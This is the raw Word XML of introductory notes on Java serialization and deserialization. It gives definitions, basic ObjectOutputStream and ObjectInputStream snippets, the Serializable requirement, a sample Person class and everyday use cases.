      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Serialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54614E1B" w14:textId="7E5B350E" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Serialization is the process of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>converting a Java object into a byte stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, so it can be stored in a file, sent over a network, or saved in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE3F3F" w14:textId="3620D37B" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Why?</w:t>
      </w:r>
      <w:r w:rsidR="004F3461" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>To persist (save) the state of an object or transfer it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD1AC5" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Java Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251CAA8" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374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7804320"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ObjectOutputStream</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ou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ObjectOutputStrea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FileOutputStream</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data.ser"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D858D6" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374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7804320"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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writeObject</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bjec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object must be Serializable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0025D" w14:textId="32EAEBF2" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374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7804320"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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clos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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E297827" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:pict w14:anchorId="11595ED0">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F321C5" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>📥</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756365D8" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Deserialization is the reverse process — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>reconstructing a Java object from a byte stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147032A" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Java Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6152334F" w14:textId="77777777" w:rsidR="00C64759" w:rsidRPr="00CE4B95" w:rsidRDefault="00C647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723957"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ObjectInputStream</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ObjectInputStrea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FileInputStream</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data.ser"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29873717" w14:textId="77777777" w:rsidR="00C64759" w:rsidRPr="00CE4B95" w:rsidRDefault="00C647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723957"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MyObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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MyObjec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readObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F8EE1" w14:textId="03778E97" w:rsidR="00C64759" w:rsidRPr="00CE4B95" w:rsidRDefault="00C647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723957"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in</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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B74251" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:pict w14:anchorId="2C97112E">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="087807C1" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE20EB" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">The class </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>must implement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>java.io.Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1E536" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21ED92" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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io</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Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA3DB4C" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520C39B" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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Person</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mplement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erializabl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14FCF8B6" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE2B12" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312719EC" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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441A380B" w14:textId="77777777" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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constructors, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3252DD40" w14:textId="16CF9752" w:rsidR="00FE77EA" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46540A45" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:pict w14:anchorId="3A7ACD5B">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="211ACC50" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00374AB1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Real-World Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CEB56" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Saving user session data to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D06A7" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
